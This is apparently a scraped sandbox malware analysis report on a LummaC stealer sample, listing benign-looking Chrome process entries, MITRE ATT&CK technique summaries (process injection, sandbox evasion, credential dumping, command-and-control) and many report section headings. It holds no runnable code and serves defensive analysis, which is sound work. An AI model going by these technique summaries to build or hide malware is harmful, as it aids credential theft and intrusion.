Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2224,i,15343665010239501280,16387244067859444287,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2244 /prefetch:3
Imagebase:	0x7ff7dbe10000
File size:	2'742'376 bytes
MD5 hash:	BB7C48CDDDE076E7EB44022520F40F77
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:04:52
Start date:	27/10/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --no-subproc-heap-profiling --field-trial-handle=4452,i,15343665010239501280,16387244067859444287,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=3824 /prefetch:3
Imagebase:	0x7ff7dbe10000
File size:	2'742'376 bytes
MD5 hash:	BB7C48CDDDE076E7EB44022520F40F77
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\EpicUpdate.exe

C:\Users\user\AppData\Local\Temp\temp_bRBfgSMcTpYCpANwkGLzu

Chrome Cache Entry: 54

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe